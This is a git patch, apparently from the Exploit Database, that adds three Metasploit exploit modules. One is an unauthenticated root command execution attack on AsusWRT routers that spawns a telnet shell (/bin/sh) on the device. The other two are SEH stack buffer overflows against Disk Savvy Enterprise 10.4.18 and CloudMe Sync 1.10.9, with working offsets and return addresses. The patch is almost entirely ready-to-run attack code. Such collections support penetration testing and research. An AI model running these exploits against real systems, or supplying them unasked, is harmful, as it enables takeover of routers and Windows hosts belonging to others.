From d0ed4bb0d224c6768aea2e21c4dd8848f39358a6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 27 Feb 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-02-27 3 changes to exploits/shellcodes Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit) CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit) --- exploits/hardware/remote/44176.rb | 132 ++++++++++++++++++++++++++++++ exploits/windows/remote/44174.rb | 77 +++++++++++++++++ exploits/windows/remote/44175.rb | 67 +++++++++++++++ files_exploits.csv | 3 + 4 files changed, 279 insertions(+) create mode 100755 exploits/hardware/remote/44176.rb create mode 100755 exploits/windows/remote/44174.rb create mode 100755 exploits/windows/remote/44175.rb diff --git a/exploits/hardware/remote/44176.rb b/exploits/hardware/remote/44176.rb new file mode 100755 index 000000000..92c961624 --- /dev/null +++ b/exploits/hardware/remote/44176.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', + 'Description' => %q{ + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to + perform a POST in certain cases. This can be combined with another vulnerability in + the VPN configuration upload routine that sets NVRAM configuration variables directly + from the POST request to enable a special command mode. + This command mode can then be abused by sending a UDP packet to infosvr, which is running + on port UDP 9999 to directly execute commands as root. + This exploit leverages that to start telnetd in a random port, and then connects to it. + It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], + ['CVE', '2018-5999'], + ['CVE', '2018-6000'] + ], + 'Targets' => + [ + [ 'AsusWRT < v3.0.0.4.384.10007', + { + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Jan 22 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(9999) + ]) + + register_advanced_options( + [ + OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) + ]) + end + + def exploit + # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD + # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! + post_data = Rex::MIME::Message.new + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") + + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => "/vpnupload.cgi", + 'method' => 'POST', + 'rport' => datastore['ASUSWRTPORT'], + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res and res.code == 200 + print_good("#{peer} - Successfully set the ateCommand_flag variable.") + else + fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") + end + + + # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. + info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44174.rb b/exploits/windows/remote/44174.rb new file mode 100755 index 000000000..82e87706d --- /dev/null +++ b/exploits/windows/remote/44174.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 800 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + seh = generate_seh_record(target.ret) + connect + + buffer = make_nops(target['Offset']) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp + buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) + + header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44175.rb b/exploits/windows/remote/44175.rb new file mode 100755 index 000000000..5d7fcac75 --- /dev/null +++ b/exploits/windows/remote/44175.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CloudMe Sync v1.10.9', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in CloudMe Sync v1.10.9 client application. This module has been + tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hyp3rlinx', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'References' => + [ + [ 'CVE', '2018-6892'], + [ 'EDB', '44027' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ 'CloudMe Sync v1.10.9', + { + 'Offset' => 2232, + 'Ret' => 0x61e7b7f6 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 17 2018', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(8888)]) + + end + + def exploit + connect + + buffer = make_nops(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << payload.encoded + + sock.put(buffer) + handler + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dd6c9bbf8..8d7075e41 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16252,6 +16252,9 @@ id,file,description,date,author,type,platform,port 44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows, 44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows, 44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows, +44174,exploits/windows/remote/44174.rb,"Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,9124 +44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888 +44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,